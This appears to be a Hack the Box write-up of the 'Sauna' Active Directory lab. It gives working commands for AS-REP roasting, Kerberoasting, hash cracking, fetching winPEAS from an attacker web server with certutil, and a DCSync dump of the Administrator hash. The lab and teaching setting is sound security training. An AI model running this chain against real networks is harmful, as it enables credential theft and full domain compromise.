In today’s post we will go over Sauna, Active Directory Machine from Hack the Box, with interesting Attack Vectors. Enjoy!
1)Staring with Nmap scan firstly:
nmap -sC -sV -A -T4 <target_ip>
2)Since port 88 is open what I like to do is to start Kerbrute to enumerate the usernames on the Remote Host while we are conducting enumeration of other services:
kerbrute userenum -d <DOMAIN> /usr/share/seclists/SecLists-master/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>3)The most interesting service running here for me is definitely port 80 – web server, but before we jump on that one, I wanted to make sure that we check every service available for us at the moment:
3.1)I wasn’t able to authenticate to the SMB Shares as Anonymous User:
smbclient -L //<TARGET_IP> -N3.2)Username enumeration via RPC (Port 135) failed as well as we:
rpcclient -U "" -N <TARGET_IP>3.3)Last thing I wanted to check is if we can enumerate the machine more via LDAP (389, 636), for that I used windapsearch, but unfortunately for us, that didn’t work either
python3 windapsearch.py -d <DOMAIN> --dc-ip <DOMAIN_IP> -U
4)Okay, the only service left to enumerate now when we exhausted other options is port 80. I quickly edited my /etc/hosts file and there we see a pretty much basic website:
4.1)From here I conducted both directory busting (with dirsearch & ffuf) and subdomain enumeration with ffuf as well. Both didn’t yield any results for me.
4.2)So at this point I didn’t have much, I enumrated all the services on the remote host and the website didn’t give us much. But, one of the pages on the website, /about (about.html) reveals the name of the clients of this Bank. That can be interesting as we know that port 88 is open and we can try to conduct ASREPRoasting attack for which we only need usernames.
Index.html:
about.html
4.3)That definitely looks interesting, in addition to that I didn’t know what else to try so I decided to give it a try, before creating file with potential targets, let’s also check the result of Kerbrute enumeration
Very interesting, I see that Kerbrute 2 employees an admin account, from here I can conclude that naming convection is the first letter of first name + last name + @EGOTISTICAL-BANK.LOCAL.
4.4)From here we can create a file with our targets that we found on the website by following naming convection that Kerbure identified, but just to be safe, I decided to user username-anarchy, which is an amazing script that will take a user_names files and make another file with different variations of those usernames. Here is the script syntax and the final result:
First create file with the names from the website that we found so far:
Then, let’s use it for our username-anarchy script to create various combinations of those Names:
./username-anarchy --input-file <TARGET_NAMES> --select-format first,flast,first.last,firstl > unames.txt
4.5)Cool, now we have a nice list of usernames, let’s use it for ASREPRoasing attack, to check if any of the employees has pre-authentication enabled:
impacket-GetNPUsers <DOMAIN_NAME>/ -usersfile unames.txt -dc-ip <DC_IP> -request -format hashcatBingo, we got one hit:
4.6)So from here we can conclude that we didn’t even have to spot that tiny difference on the website in about.html, if we only used result of Kerbrute with ASREPRoasting attack we would find our way in, that is good to know. Let’s try to crack the hash for user fsmith, for that I will be using hashcat
hashcat -m 18200 hash.txt rockyou.txt### Note that I used bare metal here for better performance ###
Checking if I can remotely access the machine with fsmith:
evil-winrm -u fsmith -i 10.10.10.175
We got user.txt. Let’s move to the Privilege escalation.
5)I loaded the Bloodhound so I can better enumerate the machine, steps to do so:
5.1)Start neo4j console
sudo neo4j console 5.2)Start bloodhound
bloodhound5.3)Now let’s gather the data for Bloodhound
bloodhound-python -d <DOMAIN> -u <user> -p <password> -ns <DC_IP> -c all
This way I got unexpected error:
I double-checked if everything was correct, and it is, hmmm…. I added sudo before the command and then it worked, I am leaving it here just in case someone stumbled across the same issue.
5.4)Okay, so let’s see what Bloodhound has to say:
From here by checking the fastest way to High Privilege Targets, we can see that svc_loanmgr service account has DCSync rights, which is great for us at that is very fast way to dump all the hashes from remote host, but how to get to the svc_loanmgr. Let’s see what we can do as fsmtih:
By checking list of all Kerberostable users, I see hsmith user being there. My initial thought process here is that maybe there is password re-use between hsmith and svc_loanmgr. So, I decided to check that, let’s do the Kerberoasting attack!
5.5)We will be using impacket for that one as well:
impacket-GetUserSPNs <DOMAIN_NAME>/<USERNAME>:<PASSWORD> -dc-ip <DC_IP> -request
5.6)An error, Clock skew too great. Which essentially means that there is a big time difference between my time zone and time zone of Remote Host, let’s fix that one:
5.7)Let’s try again now:
Now it works, cool!
5.8)Let’s try to crack the hash, again using hashcat with bare metal for better performance:
hashcat -m 13100 rockyou.txtCracked, but the same password as fsmith, which means my idea was wrong, as I already tried if svc_loanmgr was using the same password as fsmith:
5.9)Okay, let’s continue out hunt on how to escalate our privileges, which essentially means how to found a password for svc_loangmgr to conduct DCSync attack. I decided to transfer winpeas to Remote Host and thus speed up my enumeration:
For that you can either use the upload feature of evil-winrm, or if you obtain the shell somehow different, you can use certutil for file transfer
cerutil -urlcache -split -f "http://10.10.10.10:8000/winpeas.exe" winpeas.exeAlso, don’t forget to start your Python web server at the location where you have Winpeas
python3 -m http.server5.10)By enumerating output of Winpeas, I found AutoLogon credentials for svc_loanmgr
6)Let’s try if it works via evil-winrm:
Great, now let’s conduct DCSync attack, for that we will use impacket’s secretsdump:
impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -just-dc-user Administrator
Strange error again… This should work according to Bloodhound, I suspected that something might be wrong with my version if Impacket, so I decided to quickly start Python virtual environment:
python3 -m venv venvsource venv/bin/activateNow let’s install impacket:
pip3 install impacketAnd now our DCSync attack works, great!
6.1)From here we need only second part of NTLM(SAM) hash of Administartor that we can use with evil-winrm:
Awesome, we got root.txt. GG!
Lessons Learned
1)Username enumeration and understanding the naming convection of users on remote hosts is always more than important and great way to do so is to use Kerbrute if port 88 is open.
2)If we feel stuck when trying to escalate privileges when dealing with Active Directory don’t forget to look for potentially hidden credentials both automated and manual way.
3)I had to do some troubleshooting when solving this box, where I learned that when gathering data for Bloodhound it’s a good idea to use sudo. In addition to that if you are confident that one attack vector should work, like I was in this case for the DCSync attack maybe there is something wrong with the script, in my case impacket. You can either install the fresh new version of it or quickly start Python venv to check if the issue persists with the new install.
Leave a Reply